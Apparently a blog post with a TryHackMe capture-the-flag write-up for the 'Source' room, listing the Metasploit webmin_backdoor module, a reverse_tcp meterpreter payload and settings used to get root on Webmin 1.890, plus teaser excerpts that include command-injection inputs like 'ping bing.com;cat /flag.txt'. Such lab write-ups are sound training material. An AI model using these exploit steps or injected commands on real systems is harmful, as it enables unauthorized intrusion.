Skip to main content

Source


Source



source is a new room at the time this write-up has done so let's get started 

as we can see before we so any think there is a hint in-room description 
"Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool"

we can see here that services are running called Webmin and it says that Webmin is a web-based system configuration tool
let's run Nmap and see what we will get while Nmap is running let's take a look at Webmin vulnerabilities



looks like there are remote code execution in some versions so let's back to Nmap results and see what version we have 



as we can see it's running on 1.890 version the good news is this version is vulnerable to Webmin password_change.cgi Backdoor

this vulnerability has an exploit in Metasploit 

you need to use exploit/unix/webapp/webmin_backdoor 


set payload linux/x64/meterpreter/reverse_tcp

set RHOST "machine-IP"

set LHOST "your-IP" >> you can get it by using ifconfig you will find it under tun0 

set target 0

set ssl true


exploit 



and now we get root access 

you can simply find the flags by using this 

find / -type f -name '*.txt'

this will list all files that end with .txt extension 

the first result will be root flag and if you move done a little bit you ganna find user flag 



Done!✌

Comments

Post a Comment

Popular posts from this blog

Jack-of-All-Trades

Jack-of-All-Trades TryHackMe | Jack-of-All-Trades First of all, this write up is quite long so be patient and stay tunned coz it's a fun box and you may  learn something new so take your notes and let's jump into this machine starting with enumeration we ganna use Nmap for that to see what ports and services are running as we can see there are web service and ssh but both of them running on different ports so keep that in mind  let's go to the website and check this out but first, we need to allow HTTP to run port 22 you need to follow these steps  1- Select and copy the following preference name network.security.ports.banned.override 2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful. 3- In the search box above the list, type or paste ports and pause while the list is filtered If the above-listed preference exists: 4- Double-click it and add a comma to the end of the list followed by the port numb
Post a Comment
Read more

Plethora

Plethora Tryhackme | Plethora   we will start with enumeration we ganna use Nmap to see what ports and services are running  as we can see we have a lot keep them in txt file we ganna use some of them later but for now we have port 80 is open which means wh have a web service up and running  as we can see we have a web page  let's take a look at the source page  ok let's open one by one of that machines let's start with DVWA ------------------------------------ DVWA DVWA is a well-known vul machine with username: admin and password: password  log in and go to command injection tap this vulnerability is about running a command on the server side so  we ganna use it to capture our flag  use: ping bing.com;cat /flag.txt flag 1 Done! ✌ ------------------------------------ XVWA as we did with DVWA we ganna do it here navigate to OS Command injection tap  and run this  use: ping bing.com;cat /flag.txt flag 2 Done! ✌ ------------------------------------ Mutillidae Mutillidae also
Post a Comment
Read more

Easy Steganography

Easy Steganography Tryhackme | Easy steganography First, you need to download the attached file and unzip it you will end up with 4 images each one contains its flag  Flag 1   if you open this image you will see a normal pic without any interesting info  and if you try to use "ExifTool" or "binwalk" you will get normal information  but if you use to try to take a look with "hexdump" you gonna earn your flag ✌ use :  hexdump -C flag1.jpeg | grep S   Flag 2 flag 2 is the same image as flag1 no interesting info so we will use "binwalk" here  use:   binwalk flag2.jpeg as you can see there is another image within the flag2 image so we need to extract it  use:  binwalk --dd '.*' flag2.jpeg as you can see after extracting a new folder came up navigate to that folder and you will see  a new image called 1326F just open it and you will get flag2 ✌ Flag 3 This one is so simple you just need to use strings command to capture the flag ✌ use: strings
Post a Comment
Read more